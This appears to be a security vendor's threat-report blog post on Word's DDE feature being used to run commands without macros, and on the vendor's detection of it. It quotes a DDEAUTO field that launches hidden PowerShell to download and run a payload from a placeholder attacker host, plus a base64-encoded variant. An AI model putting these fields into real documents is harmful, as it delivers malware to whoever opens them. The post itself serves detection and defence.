Testing Macro-less Code Executes Without Macros

A post this week on the SensePost blog details “a way to get command execution on MSWord without any Macros, or memory corruption.”

The method described utilizes the “Dynamic Data Exchange (DDE) protocol” in order to execute a command. The blog entry shows the step-by-step instructions on how to create a field in a Word document to use this method.

In their example, SensePost used the following DDE code as a malicious example, which attempts to download a malicious payload to execute:

{ DDEAUTO c:\\Windows\\System32\\cmd.exe “/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http[:]//evilserver[.]ninja/pp.ps1’);powershell -e $e “}

When we followed the instructions, and created a Word document, it was not detected by our Machine Learning Engine.

However, all this method allows is a command to be executed – a malicious payload still has to be dropped or downloaded (as in the example above) and then executed.

So, we altered the example, utilizing the example from the Retefe banking trojan we looked at last week, which uses Powershell to execute a base64 encoded script passed as a parameter. This makes the DDE command look like this:

{ DDEAUTO c:\\Windows\\System32\\cmd.exe “/k powershell.exe –e WwBDAEgAYQByAFsAXQBdACAAKAAzADYALAAgADEAMQA5ACAALAAgADEAMQA1A
[truncated for length]…=”}

Once altered, Hector detected the Word document as malicious with 94% confidence.

Here is a summary of the mitigations to this:

  • After being advised of this research, “Microsoft responded that as suggested it is a feature and no further action will be taken, and will be considered for a next-version candidate bug.” Microsoft clearly does not consider it a critical issue.
  • A document with this functionality still brings up two pop-up windows requesting user approval to proceed – so from a social engineer perspective, it is no different for an attacker than attempting to convince a user to run a macro.
  • This method only executes a command. In order to execute malicious code, the payload must either be dropped or downloaded – both of these provide opportunities for BluVector to detect the payload and/or the document itself.

All Threat Reports